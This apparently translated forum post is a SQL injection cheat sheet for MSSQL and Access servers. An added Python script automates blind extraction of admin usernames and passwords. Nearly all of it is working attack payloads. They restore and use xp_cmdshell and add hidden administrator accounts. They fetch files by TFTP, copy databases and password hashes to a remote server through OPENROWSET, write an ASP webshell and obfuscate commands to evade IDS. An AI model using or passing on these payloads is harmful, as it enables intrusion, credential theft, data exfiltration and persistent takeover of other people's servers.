SQL Injection Statements 2

Posted 2012-9-15 14:32:40
1. Checking whether an injection point exists
and 1=1 and 1=2

2. Guessing table names. The usual table names are admin, adminuser, user, pass, password and the like.
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) --- checks whether a table named admin exists

3. Guessing the number of accounts. If 0< returns the normal page and 1< returns the error page, there is exactly one account.
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
Column names can also be guessed with: and (select count(column_name) from table_name)>0

4. Guessing field names. Put the field name you are guessing inside the len( ) parentheses.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(name)>0)        -- username field, guessed here as name
and 1=(select count(*) from admin where len(password)>0)    -- password field, guessed here as password

5. Guessing the length of each field. Change the number after > until the normal page comes back. The 1=(select count(*) ...) form only works as written when the admin table holds exactly one row, as established in step 3; with more rows use the top 1 form shown at the end.
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)    error page
and 1=(select count(*) from admin where len(name)>5)    normal page, so the length is 6
and 1=(select count(*) from admin where len(name)=6)    normal page

and 1=(select count(*) from admin where len(password)>11)    normal page
and 1=(select count(*) from admin where len(password)>12)    error page, so the length is 12
and 1=(select count(*) from admin where len(password)=12)    normal page
Length can also be guessed with: and (select top 1 len(username) from admin)>5

6. Guessing characters
and 1=(select count(*) from admin where left(name,1)='a')    --- guesses the first character of the username
and 1=(select count(*) from admin where left(name,2)='ab')   --- guesses the second character of the username
Keep adding one character at a time until you reach the length found in step 5; the account name is then fully recovered.

Content can also be guessed by character code: and (select top 1 asc(mid(password,1,1)) from admin)>50
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
This query can also guess Chinese usernames and passwords: replace the trailing number with the code of the Chinese character and convert the result back into characters at the end. (asc() and mid() are Access/JET function names; the MSSQL equivalents are ascii() and substring().)
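Steps 1 to 6 above are done by hand, one request per guess. As an added example that is not part of the original post, the Python below automates steps 1, 3, 5 and 6 against a small in-memory stand-in for the vulnerable page: sqlite3 replaces MSSQL, with len() and ascii(substring()) registered so that the post's payload shapes run unchanged (ascii/substring are the MSSQL spellings of the post's asc/mid). The news and admin tables, the single admin row (admin1 / p@ssw0rd1234) and the column names are constructed sample data. The binary search over the > comparison is the same trick the post does by hand in step 5, just driven by code.

```python
"""Blind extraction loop for steps 1, 3, 5 and 6 above (added example, not
code from the original post). An in-memory sqlite3 database stands in for
the MSSQL backend; len() and ascii(substring()) are registered so that
MSSQL-style payloads run unchanged. The news/admin tables, the single admin
row and the column names are constructed sample data."""
import sqlite3

# Constructed sample data: one row in admin, as step 3 of the post assumes.
ADMIN_ROWS = [("admin1", "p@ssw0rd1234")]


def build_db():
    """Stand-in backend with MSSQL-named string functions."""
    con = sqlite3.connect(":memory:")
    con.create_function("len", 1, lambda s: None if s is None else len(s))
    con.create_function("ascii", 1, lambda s: ord(s[0]) if s else None)
    con.create_function("substring", 3,
                        lambda s, start, n: s[start - 1:start - 1 + n])
    con.execute("create table news(id integer primary key, title text)")
    con.execute("insert into news values (1, 'first post')")
    con.execute("create table admin(name text, password text)")
    con.executemany("insert into admin values (?, ?)", ADMIN_ROWS)
    return con


def page_returns_normally(con, id_param):
    """The vulnerable endpoint: ?id= is concatenated straight into the query.
    True is the normal page (a row came back); False is an empty result or
    the error page, which is all a blind attacker can distinguish."""
    sql = "select title from news where id=" + id_param
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def oracle(con, condition):
    """Append an 'and <condition>' payload to a valid id, as the post does."""
    return page_returns_normally(con, "1 " + condition)


def has_injection_point(con):
    """Step 1: 'and 1=1' must behave differently from 'and 1=2'."""
    return oracle(con, "and 1=1") and not oracle(con, "and 1=2")


def count_rows(con, table="admin"):
    """Step 3: the smallest n for which 'n<count(*)' fails is the row count."""
    n = 0
    while oracle(con, f"and {n}<(select count(*) from {table})"):
        n += 1
    return n


def find_length(con, column, table="admin", max_len=255):
    """Step 5, binary-searching 'len(column)>N' instead of stepping N by hand:
    the smallest N for which the test fails is the length."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(con, f"and 1=(select count(*) from {table} where len({column})>{mid})"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def find_char(con, column, pos, table="admin"):
    """Step 6 by character code (the post's asc(mid()) form in MSSQL spelling),
    binary-searched over printable ASCII with '>code' comparisons."""
    lo, hi = 32, 127
    while lo < hi:
        mid = (lo + hi) // 2
        payload = (f"and 1=(select count(*) from {table} "
                   f"where ascii(substring({column},{pos},1))>{mid})")
        if oracle(con, payload):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_value(con, column, table="admin"):
    """Length first, then one character per position, as steps 5 and 6 do."""
    length = find_length(con, column, table)
    return "".join(find_char(con, column, i, table) for i in range(1, length + 1))


if __name__ == "__main__":
    db = build_db()
    print("injection point:", has_injection_point(db))
    print("admin rows:", count_rows(db))
    print("name:", extract_value(db, "name"))
    print("password:", extract_value(db, "password"))
```

Run it directly to see the four results. Against a real target, page_returns_normally is the only function that changes: it becomes an HTTP request whose response is classified as the normal page or the error page. Note that find_char only covers printable ASCII; the post's remark about Chinese characters means widening the code range for that position.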

Column enumeration through error messages: each group by ... having query fails with an error naming the next column that is not yet in the group by list, and once the list is complete the insert writes a new row.
group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

Enumerating the columns of a table from INFORMATION_SCHEMA, one per query, and then reading the data:
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id')--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id','login_name')--
UNION SELECT TOP 1 login_name FROM logintable--
UNION SELECT TOP 1 password FROM logintable WHERE login_name='Rahul'--

Check the server's patch level (the original note: if this errors out, SP4 has been applied). When the application shows database errors, the conversion error from comparing an integer with the @@VERSION string also reveals the full version string.
and 1=(select @@VERSION)--

Check the privileges of the database connection account: a normal page means the account holds the sysadmin server role.
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--

Determine the database connection account (if the application connects as sa, a normal page proves that the connection account is sa).
and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name())--

Check whether xp_cmdshell has been removed
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')--

If xp_cmdshell has been dropped, restore it; an absolute path to the DLL is also supported
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--

Reverse ping test against your own host
;use master;declare @s int;exec sp_oacreate 'wscript.shell',@s out;exec sp_oamethod @s,'run',NULL,'cmd.exe /c ping 192.168.0.1';--

Add an account
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--

Create a virtual directory pointing at the E: drive:
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "e","e:\"'--

Set access properties (used together with writing a webshell):
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'

MSSQL can also use UNION queries
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin    (UNION works well on Access too)

Dumping the database path (爆库), a special trick: %5c is \. Change the / or \ in the path to %5c and submit; on ASP/Access sites the database open fails and the error message discloses the path of the .mdb file.

Getting the web path
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(500) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', @value=@test OUTPUT insert into newtable(paths) values(@test)--
;use ku1;--
;create table cmd (str image);-- creates a table cmd with an image-type column

Test procedure when xp_cmdshell exists:
;exec master..xp_cmdshell 'dir'
;exec master.dbo.sp_addlogin jiaoniang$;-- adds a SQL login
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
;exec master.dbo.sp_addsrvrolemember jiaoniang$, sysadmin;--
;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--
exec master..xp_servicecontrol 'start', 'schedule'    starts a service
exec master..xp_servicecontrol 'start', 'server'
; DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add'
; exec master..xp_cmdshell 'tftp -i yourip get file.exe'-- uploads a file with TFTP

;declare @a sysname;set @a=db_name();backup database @a to disk='\\your_ip\your_share\bak.dat'
The backup to a UNC share can be used when the commands above are restricted.
select * from openrowset('sqloledb','server';'sa';'','select ''OK!''; exec master.dbo.sp_addlogin hax')

Query construction:
SELECT * FROM news WHERE id=... AND topic=... AND .....
admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <> '
select 123;--
;use master;--
a' or name like 'fff%';-- shows that there is a user called ffff.
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
;update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
;update [users] set email=(select top 1 count(id) from password) where name='ffff';--
;update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
;update [users] set email=(select top 1 name from password where id=2) where name='ffff';--
The statements above fetch the first user table in the database and store its name in user ffff's email field.
Viewing ffff's profile then shows that the first user table is called ad.
The table name ad then gives that table's ID, and from the ID the name of the second table.

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--    (the char() concatenation spells chris without any quote characters)
insert into users values( 667,123,123,0xffff)--
insert into users values ( 123, 'admin--', 'password', 0xffff)--
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from msysobjects)>0    // Access database

Enumerating table names
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--
This writes the first table name into the aaa field of table aaa.
Once the first table has been read, the second is read the same way by appending and name<>'the name just obtained' to the condition.
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--
Then: id=1552 and exists(select * from aaa where aaa>5)
This reads the second table; continue one at a time until none are left.
Fields are read like this:
;update aaa set aaa=(select top 1 col_name(object_id('table_name'),1));--
Then id=152 and exists(select * from aaa where aaa>5) errors out, and the conversion error message reveals the field name
;update aaa set aaa=(select top 1 col_name(object_id('table_name'),2));--
Then id=152 and exists(select * from aaa where aaa>5) errors out, and the error message reveals the next field name

[Getting table names] [update a field to the table name, then find a way to read that field's value to obtain the table name]
update table_name set field=(select top 1 name from sysobjects where xtype='u' and status>0 [ and name<>'table name already obtained', adding one more each round]) [ where condition]    select top 1 name from sysobjects where xtype='u' and status>0 and name not in('table1','table2',…)
Creating a database administrator account and a system administrator account through a SQL Server injection vulnerability [the current account must be in the SYSADMIN role]

[Getting table field names] [update a field to the field name, then read that field's value to obtain the field name]
update table_name set field=(select top 1 col_name(object_id('table_to_query'),column_number, e.g. 1)) [ where condition]

Evading IDS detection [using variables]: the procedure name is assembled from string pieces so that the literal xp_cmdshell never appears in the request
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'

1. Opening a remote database
Basic syntax
select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1')
Parameters: (1) OLEDB provider name
2. The connection-string parameter can use any port for the connection, for example
select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table')
3. Copying the target host's entire database: insert every local table into tables on your own remote server.

Basic syntax:
insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1') select * from table2
This statement copies all data from table2 on the target host into table1 in the remote database. In practice, change the IP address and port in the connection string to point wherever needed, for example:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from table2
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysdatabases') select * from master.dbo.sysdatabases
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysobjects') select * from user_database.dbo.sysobjects
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _syscolumns') select * from user_database.dbo.syscolumns
Copying the database:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from database..table1
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table2') select * from database..table2

Copying the hash table: login password hashes are stored in sysxlogins (in the master database on SQL Server 2000). Method:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysxlogins') select * from database.dbo.sysxlogins
Once you have the hashes, brute-force them offline.

Directory traversal: first create a temporary table temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- lists all drives
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- lists the subdirectories
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- gets the whole subdirectory tree and stores it in temp
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- reads a file's contents
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- (xp_dirtree can be run with PUBLIC privileges)
Checking server and database role membership (a normal page means the connection account holds that role):
Statement 1: and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
Statement 2: and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
Statement 3: and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
Statement 4: and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
Statement 5: and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
Statement 6: and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
Statement 7: and 1=(SELECT IS_MEMBER('db_owner'));--

Writing paths into a table (the 0<> comparison of an integer with the path column fails, and the conversion error message discloses the directory name):
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree 'c:\'--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--
and 0<>(select top 1 paths from dirs1)--

Backing up the database into the web directory so it can be downloaded
;declare @a sysname; set @a=db_name();backup database @a to disk='e:\web\down.bak';--

and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)    (char(85) is 'U' written without quotes; the integer-to-name comparison errors and the message discloses the table name)
and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects)    look at the related tables.
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)

-=- wscript.shell example -=-
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--

Reading a file line by line through scripting.filesystemobject:
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

Writing an ASP webshell through scripting.filesystemobject:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'

declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528
waitfor delay '00:00:05'

; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--

xp_dirtree can be run with PUBLIC privileges
exec master.dbo.xp_dirtree 'c:' returns two columns, subdirectory and depth. subdirectory is a character column and depth is an integer column.
create table dirs(paths varchar(100), id int)
Create a table whose columns match those returned by xp_dirtree above: the same number of columns with the same types.
insert dirs exec master.dbo.xp_dirtree 'c:'
As long as the table we create matches the column definitions returned by the stored procedure, the insert ... exec runs and the results land in the table, from where the information we want can be read out step by step.
